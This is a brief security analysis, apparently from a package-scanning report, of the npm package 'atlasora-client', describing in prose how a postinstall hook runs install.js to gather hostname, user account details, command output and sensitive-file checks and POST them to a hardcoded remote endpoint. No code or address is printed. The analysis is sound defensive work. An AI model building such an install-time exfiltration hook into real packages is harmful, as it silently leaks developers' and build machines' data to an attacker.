package.json declares "postinstall": "node install.js", which runs automatically on npm install. install.js requires https, fs, os, and child_process; collects host identifiers via os.hostname() and os.userInfo(); invokes execSync() to gather additional system data; checks for sensitive files via fs.existsSync(); and POSTs the collected data over an https.request() to a hardcoded remote endpoint. This is the canonical install-time system-information exfiltration shape: any developer or CI machine that runs npm install atlasora-client will silently leak host identity, user account info, and reconnaissance data about local filesystem contents to an attacker-controlled destination.